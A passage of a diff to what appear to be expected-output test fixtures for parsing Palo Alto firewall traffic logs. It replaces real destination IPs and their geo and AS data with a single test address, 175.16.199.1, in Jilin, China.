"CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 130, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -4170,7 +4216,7 @@ "packets": 1, "ip": "192.168.15.210" }, - "message": "192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4185,7 +4231,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4207,7 +4253,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=" + "community_id": "1:oGfTGYDsAux8eMBCoBff8uxez9M=" } }, "sequence_number": 32091137, @@ -4227,8 +4273,8 @@ ], "network": { "community_id": [ - "1:XjmNQR0k4Z9rGS6dXH+3mvmrqzA=", - "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=" + "1:vRrHCKzYF5Vw0mmasFYnIzPK2V4=", + "1:oGfTGYDsAux8eMBCoBff8uxez9M=" ], "transport": "udp", "application": "dns", @@ -4268,14 +4314,14 @@ ], "ip": [ "192.168.15.210", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941877136Z", - "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031575Z", + "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:34.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4295,27 +4341,29 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.9.142" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 1991, - "ip": "172.217.9.142", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -4334,7 +4382,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4349,7 +4397,7 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.9.142" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4371,7 +4419,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:3vS12CJ5QBY6RbGXOUPYKL9E0+U=" + "community_id": "1:20YsvyETmfH7QkVygqjJx30vL9c=" } }, "sequence_number": 32091138, @@ -4391,8 +4439,8 @@ ], "network": { "community_id": [ - "1:lVJii2BraOSOIissazAe7/enqkQ=", - "1:3vS12CJ5QBY6RbGXOUPYKL9E0+U=" + "1:YZVhkrMgzSXG8zwnpm9Td0Ird5o=", + "1:20YsvyETmfH7QkVygqjJx30vL9c=" ], "transport": "udp", "application": "quic", @@ -4432,14 +4480,14 @@ ], "ip": [ "192.168.15.224", - "172.217.9.142", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 15000000000, - "ingested": "2021-09-08T12:40:05.941880602Z", - "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031580400Z", + "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:37.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4459,27 +4507,29 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 54113, + "number": 4837, "organization": { - "name": "Fastly" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 523, - "ip": "151.101.2.2", + "ip": "175.16.199.1", "packets": 5 }, "rule": { @@ -4498,7 +4548,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4513,7 +4563,7 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -4535,7 +4585,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:l6nFWeOSs/2aQaVCfYhfQ09l0ko=" + "community_id": "1:Zojhh1pim37Z47JWoH9fh2sdpFg=" } }, "sequence_number": 32091139, @@ -4555,8 +4605,8 @@ ], "network": { "community_id": [ - "1:Te0H9rrEbN0bNEjgdC1n6hD8kQU=", - "1:l6nFWeOSs/2aQaVCfYhfQ09l0ko=" + "1:6c2ueHhY0M4XLGN5Qb1eQwjXp5A=", + "1:Zojhh1pim37Z47JWoH9fh2sdpFg=" ], "transport": "tcp", "application": "ssl", @@ -4596,14 +4646,14 @@ ], "ip": [ "192.168.15.224", - "151.101.2.2", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941884096Z", - "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031584700Z", + "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4626,30 +4676,29 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.66" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0839, - "lat": 37.3861 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 2428, - "ip": "216.58.194.66", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -4668,7 +4717,7 @@ "packets": 5, "ip": "192.168.15.224" }, - "message": "192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4683,7 +4732,7 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.66" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4705,7 +4754,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hVpNmZPedeB/gYRm9U4/gS+LNkQ=" + "community_id": "1:WQEhqz707biMNYr4xqpmYHCLRtE=" } }, "sequence_number": 32091140, @@ -4725,8 +4774,8 @@ ], "network": { "community_id": [ - "1:5umxbSgQhlPOZM9gbu1iBMqzRr8=", - "1:hVpNmZPedeB/gYRm9U4/gS+LNkQ=" + "1:SQhG1l5yDIlCMOEIVjUxYNpOE10=", + "1:WQEhqz707biMNYr4xqpmYHCLRtE=" ], "transport": "udp", "application": "quic", @@ -4766,14 +4815,14 @@ ], "ip": [ "192.168.15.224", - "216.58.194.66", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941887568Z", - "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031589100Z", + "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4796,27 +4845,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -4835,7 +4886,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4850,7 +4901,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4924,14 +4975,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941891046Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031592700Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4954,27 +5005,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 196, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -4993,7 +5046,7 @@ "packets": 2, "ip": "192.168.15.210" }, - "message": "192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5008,7 +5061,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -5082,14 +5135,14 @@ ], "ip": [ "192.168.15.210", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941894586Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031597200Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5112,27 +5165,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.193" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5003, - "ip": "184.51.253.193", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -5151,7 +5206,7 @@ "packets": 12, "ip": "192.168.15.224" }, - "message": "192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5166,7 +5221,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.193" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -5188,7 +5243,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:zBrhHOnlJT7YZV7WXiPAQBEhScI=" + "community_id": "1:S3xHgnhs3FnbwlCMr3H/2qm1oZA=" } }, "sequence_number": 32091143, @@ -5208,8 +5263,8 @@ ], "network": { "community_id": [ - "1:zaX+BV1nxniPCPzIGKhVpm2i7CE=", - "1:zBrhHOnlJT7YZV7WXiPAQBEhScI=" + "1:qhgYAT01S/8A/mURcMaYCBM5NnE=", + "1:S3xHgnhs3FnbwlCMr3H/2qm1oZA=" ], "transport": "tcp", "application": "ssl", @@ -5249,14 +5304,14 @@ ], "ip": [ "192.168.15.224", - "184.51.253.193", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941898026Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031602600Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5279,27 +5334,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 171, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5318,7 +5375,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5333,7 +5390,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -5355,7 +5412,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=" + "community_id": "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=" } }, "sequence_number": 32091144, @@ -5375,8 +5432,8 @@ ], "network": { "community_id": [ - "1:BengLCKQRlHSjje1eFQLdxgTKJc=", - "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=" + "1:QvcLIBQ/llZfAEhjuMmKr/RH930=", + "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=" ], "transport": "udp", "application": "dns", @@ -5416,14 +5473,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941901536Z", - "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United 